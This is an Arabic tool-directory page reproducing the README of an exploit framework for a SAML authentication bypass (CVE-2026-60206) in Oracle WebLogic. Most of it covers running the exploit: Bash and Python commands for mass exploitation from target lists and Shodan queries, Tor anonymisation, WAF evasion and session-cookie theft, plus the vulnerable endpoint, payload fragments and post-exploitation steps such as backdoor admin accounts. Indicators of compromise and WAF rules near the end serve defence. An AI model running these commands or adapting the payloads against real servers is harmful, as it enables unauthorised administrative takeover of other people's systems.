Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 - إطار عمل استغلال تجاوز مصادقة SAML في Oracle WebLogic ⚡إصدارات Bash وPython. الميزات: --detect فحص آمن، --exploit combo/unsigned/xsw/nameid/all، --shodan التكامل، --tor الدعم، المسح الجماعي، إخراج JSON/CSV/JSONL، التحقق من صحة ملفات تعريف الارتباط. 🛡️ CVSS 9.9 حرجة - استخدمه بأخلاقية، والتزم بالقانون. 🔒 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
المصادقة والترخيصأطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالتجاوز WAF

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
اختبار الاختراق
الفريق الأحمر
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

عرض المستودع
423منذ شهر واحدلم تتم المراجعة بعد

حول

👾 CVE-2026-60206 - إطار عمل استغلال تجاوز مصادقة SAML في Oracle WebLogic ⚡إصدارات Bash وPython. الميزات: --detect فحص آمن، --exploit combo/unsigned/xsw/nameid/all، --shodan التكامل، --tor الدعم، المسح الجماعي، إخراج JSON/CSV/JSONL، التحقق من صحة ملفات تعريف الارتباط. 🛡️ CVSS 9.9 حرجة - استخدمه بأخلاقية، والتزم بالقانون. 🔒

مشاركة

CVE-2026-60206

CVE-2026-60206 - إطار عمل ومجموعة أدوات استغلال تجاوز مصادقة SAML في Oracle WebLogic

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access Cross-Platform

Oracle WebLogic Server — تجاوز مصادقة SAML → الاستيلاء على حساب المسؤول

إطار عمل استغلال وماسح ضوئي شامل
لأغراض اختبار الاختراق المصرح به فقط.


⚖️ إخلاء المسؤولية القانونية والاستخدام المسؤول

تم توفير هذه الأداة لأغراض تعليمية ولاختبار الاختراق المصرح به فقط.

المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. يتحمل المستخدمون وحدهم مسؤولية التأكد من حصولهم على إذن كتابي صريح من مالك الهدف قبل الاختبار. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) والقوانين المماثلة في جميع أنحاء العالم.

باستخدامك لهذا البرنامج، فأنت توافق على:

  • استخدامه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
  • الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها.
  • عدم استخدامه في أي أنشطة ضارة أو تخريبية أو غير قانونية.

⚠️ تحذير: يتم استغلال هذه الثغرة بنشاط في البيئات الحقيقية. قد يؤدي الاستخدام غير المصرح به إلى عواقب قانونية وخيمة.


[+!] نظرة عامة على الثغرة

CVE-2026-60206 هي ثغرة حرجة لتجاوز المصادقة دون الحاجة إلى مصادقة مسبقة في تطبيق SAML (لغة ترميز تأكيد الأمان) في خادم Oracle WebLogic Server. وهي تسمح للمهاجمين عن بُعد بتجاوز مصادقة SAML والحصول على وصول إداري إلى وحدة تحكم WebLogic دون بيانات اعتماد صالحة.

كيف تعمل:

  1. حقن SAML: تنبع الثغرة من التحقق غير السليم من تأكيدات SAML. يمكن للمهاجمين صياغة استجابات SAML خبيثة تتجاوز فحوصات المصادقة.

  2. تجاوز التوقيع: تسمح الثغرة بتجاوز التحقق من توقيع XML عبر هجمات تغليف توقيع XML (XSW)، حيث يقوم المهاجمون بتغليف تأكيدات خبيثة بتوقيعات شرعية.

  3. التلاعب بـ NameID: يمكن للمهاجمين حقن تعليقات أو التلاعب بحقل NameID لانتحال هوية المستخدمين المميزين.

  4. الوصول الإداري: يمنح الاستغلال الناجح المهاجم وصولاً إدارياً إلى وحدة تحكم خادم WebLogic مع سيطرة كاملة.

حقائق أساسية:


🛠️ إطار عمل الاستغلال

يجمع الاستغلال التعليمي متعدد النواقل الشامل عدة نواقل هجوم SAML لتحقيق تجاوز المصادقة، مع ميزات متقدمة للمسح الشامل وسرقة ملفات تعريف الارتباط والوصول الإداري.

✨ الميزات

نواقل الهجوم


🕵️ المُتحقق الآمن (--detect)

يقوم المُتحقق الآمن باكتشاف غير تطفلي للثغرة دون تنفيذ حمولات ضارة أو إجراء تغييرات على النظام.

✨ الميزات


📦 التثبيت والمتطلبات

المتطلبات الأساسية

  • Python 3.6+ أو Bash 3.2+
  • curl (لنسخة Bash)
  • pip (لمكتبة requests، لنسخة Python)

تثبيت التبعيات

root@kitploit:~
# Python version
pip install requests urllib3

# Optional: Shodan support
pip install shodan

# Bash version: curl only (no additional dependencies)

[!NOTE] تعمل نسخة Bash باستخدام curl فقط دون أي تبعيات خارجية. تتطلب نسخة Python مكتبتي requests وurllib3 (اختياري: shodan لتكامل Shodan).


🚀 أمثلة الاستخدام

[1] إطار عمل الاستغلال بلغة Python (exploit.py)

root@kitploit:~
# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20

# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl

# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json

# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] إطار عمل الاستغلال بلغة Bash (exploit.sh)

root@kitploit:~
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20

# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl

# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json

# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] المُتحقق الأساسي (verifier_poc.sh)

root@kitploit:~
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 الإصدارات المتأثرة

⚠️ مهم: تؤثر هذه الثغرة على نشر خادم WebLogic المستضاف ذاتياً. طبّق Oracle CPU يوليو 2026 فوراً.


🧠 غوص تقني متعمق

1. تجاوز مصادقة SAML

تسمح الثغرة للمهاجمين بتجاوز مصادقة SAML من خلال صياغة استجابات SAML خبيثة لا يتم التحقق منها بشكل صحيح بواسطة تطبيق SAML في WebLogic.

نقطة النهاية المعرضة للثغرة:

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. نواقل الهجوم

تأكيد غير موقّع

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

تغليف توقيع XML (XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

حقن تعليقات في NameID

<saml2:NameID Format="...">

lowpriv

</saml2:NameID>

3. ما بعد الاستغلال

سرقة ملفات تعريف الارتباط

يؤدي الاستغلال الناجح إلى الحصول على ملف تعريف ارتباط JSESSIONID، مما يمنح وصولاً إدارياً إلى وحدة تحكم WebLogic.

اختطاف الجلسة

يمكن استخدام ملف تعريف الارتباط المسروق للوصول إلى:

  • وحدة تحكم إدارة WebLogic
  • نشر/إلغاء نشر التطبيقات
  • الوصول إلى موارد JNDI
  • تنفيذ أوامر عشوائية عبر JMX

الثبات

  • نشر تطبيقات خبيثة (ملفات WAR)
  • إنشاء مستخدمين إداريين كباب خلفي
  • تثبيت أدوات وصول عن بُعد

الحركة الجانبية

  • الوصول إلى خوادم أخرى في الشبكة عبر بيانات الاعتماد المسروقة
  • استغلال علاقات الثقة بين WebLogic والأنظمة الأخرى
  • التنقل إلى الشبكات الداخلية

🔍 مؤشرات الاختراق (IoCs)

تحليل السجلات

ابحث في سجلات WebLogic عن:

  • access.log – طلبات إلى /saml2/sp/acs أو /saml2/acs مع معاملات SAML غير معتادة
  • domain.log – محاولات تجاوز المصادقة مع تأكيدات SAML غير صالحة
  • diagnostic.log – أخطاء تحليل SAML أو فشل التحقق من التوقيع

الطلبات المشبوهة

  • معاملات SAMLResponse تحتوي على:
    • وسوم <saml2:Assertion> متعددة
    • تعليقات في حقول <saml2:NameID>
    • تأكيدات غير موقعة
    • XML خبيث مشفر بصيغة Base64
    • javascript: أو eval() في المعاملات

الملفات

  • ملفات جلسات غير متوقعة في أدلة WebLogic المؤقتة
  • ملفات إعدادات معدلة (config.xml, jps-config.xml)
  • ملفات WAR جديدة في دليل autodeploy
  • ملفات weblogic.security معدلة

الشبكة

  • اتصالات إدارية غير مصرح بها إلى وحدة تحكم WebLogic
  • فحوصات منافذ غير معتادة تستهدف نقاط نهاية SAML
  • اتصالات صادرة من خادم WebLogic إلى عناوين IP غير معروفة
  • اتصالات قشرة عكسية على منافذ غير معتادة

العمليات

  • عمليات Java غير متوقعة
  • عمليات قشرة مشتقة من WebLogic
  • اتصالات شبكة من مستخدم WebLogic إلى مضيفين خارجيين

🛡️ التخفيف والمعالجة

إجراءات فورية

  1. طبّق Oracle CPU يوليو 2026 فوراً
  2. عطّل SAML إذا لم يكن قيد الاستخدام النشط
  3. راقب نقاط نهاية SAML بحثاً عن نشاط مشبوه
  4. راجع سجلات الوصول بحثاً عن محاولات الاستغلال
  5. دوّر جميع بيانات الاعتماد على الأنظمة المتأثرة

إجراءات طويلة الأمد

  1. طبّق قواعد WAF لحظر طلبات SAML الخبيثة
  2. فعّل التحقق من توقيع SAML بالوضع الصارم
  3. تدقيقات أمنية منتظمة لإعدادات WebLogic
  4. تقسيم الشبكة للحد من تعرض WebLogic
  5. طبّق مراقبة SIEM لأحداث WebLogic

قواعد WAF

root@kitploit:~
# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Multiple SAML Assertions',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - NameID Comments',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Unsigned Assertion',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 المراجع

  • NVD - CVE-2026-60206
  • استشارة Oracle لتحديث التصحيحات الحرجة - يوليو 2026
  • كتالوج CISA KEV
  • SecurityFocus - CVE-2026-60206
  • The Hacker News - استغلال ثغرة يوم الصفر في WebLogic

🔗 استغلالات أخرى

  • CVE-2026-15409/15410 - إطار عمل استغلال متعدد لـ SonicWall SMA1000
  • CVE-2026-6875 - إطار عمل استغلال RCE قبل المصادقة في ServiceNow
  • CVE-2026-41091 - SolarFlare (RedSun) تصعيد الامتيازات المحلية في Microsoft Defender
  • CVE-2026-57821 - مجموعة أدوات حقن SQL في Apache Fineract
  • CVE-2026-41940 - تجاوز المصادقة في cPanel/WHM
تنزيل الأداة
الخاصيةالقيمة
📅 تاريخ الاكتشافيوليو 2026 (Oracle CPU)
⚠️ درجة CVSS9.9 (حرجة)
📋 CISA KEVأُضيف في 21 يوليو 2026
🎯 المنتجات المتأثرةOracle WebLogic Server (Fusion Middleware)
🔄 الإصدارات المُصلَّحةOracle CPU يوليو 2026
🔓 المصادقةغير مطلوبة (قبل المصادقة)
🌍 الاستغلال النشطمؤكد في البيئات الحقيقية (يوليو 2026)
الميزةالوصف
🚀 استغلال متعدد النواقل7 نواقل هجوم: unsigned, xsw_v1-4, nameid, combo
💻 مسح شاملمسح متزامن مع تجمع خيوط (Python) / FIFO (Bash)
🔐 سرقة ملفات تعريف الارتباطيسرق JSESSIONID لاختطاف الجلسات
👑 الوصول إلى وحدة التحكم الإداريةوصول إداري كامل إلى وحدة تحكم WebLogic
📁 اكتشاف الإصداريكتشف إصدارات WebLogic وحالة الثغرة الأمنية
🌐 مسح دفعاتاستغلال جماعي لأهداف متعددة مع خيوط المعالجة
🎯 اكتشاف آمنعلامة --detect اختيارية للتحقق غير التطفلي من الثغرة
🧩 تكامل Shodanتحميل الأهداف مباشرة من بحث Shodan
🔍 دعم Torإخفاء هوية المسح عبر وكيل Tor
📊 صيغ إخراج متعددةإخراج متدفق بصيغ JSON وCSV وJSONL
🪟 متعدد المنصاتيدعم Linux وmacOS وBSD وAlpine وWSL
🔒 آمن للخيوطيستخدم آليات قفل للعمليات المتزامنة
📋 حفظ الجلسة تلقائياًيحفظ ملفات تعريف الارتباط الناجحة لاستخدامها لاحقاً
⚙️ تجاوز WAFتدوير User-Agent وتأخيرات عشوائية
الناقلالوصف
unsignedتأكيد SAML غير مصادق عليه بدون توقيع
xsw_v1تغليف توقيع XML - تأكيدات متعددة
xsw_v2XSW - تجاوز التوقيع المُغلَّف
xsw_v3XSW - التلاعب بمساحات الأسماء
xsw_v4XSW - حقن تأكيدات متعددة
nameidحقن تعليقات في NameID
comboهجوم مدمج (unsigned + XSW + NameID)
الميزةالوصف
🔍 اكتشاف WebLogicيحدد نسخ WebLogic عبر LoginForm.jsp
📊 اكتشاف الإصداريكتشف إصدارات WebLogic المحددة ومستويات التصحيحات
🧪 اكتشاف نقاط نهاية SAMLيختبر نقاط نهاية SAML ACS
🔒 غير تطفلييحدد الإصدارات المعرضة للثغرة فقط
📋 إخراج JSON/CSVتصدير النتائج للتقارير
🔄 مسح شاملمسح أهداف متعددة مع دعم خيوط المعالجة
إصدار Oracle WebLogicالحالة
12.2.1.4.0🔴 عرضة للثغرة
14.1.1.0.0🔴 عرضة للثغرة
14.1.2.0.0🔴 عرضة للثغرة
15.1.1.0.0🔴 عرضة للثغرة
إصدارات أخرىتحقق من Oracle CPU يوليو 2026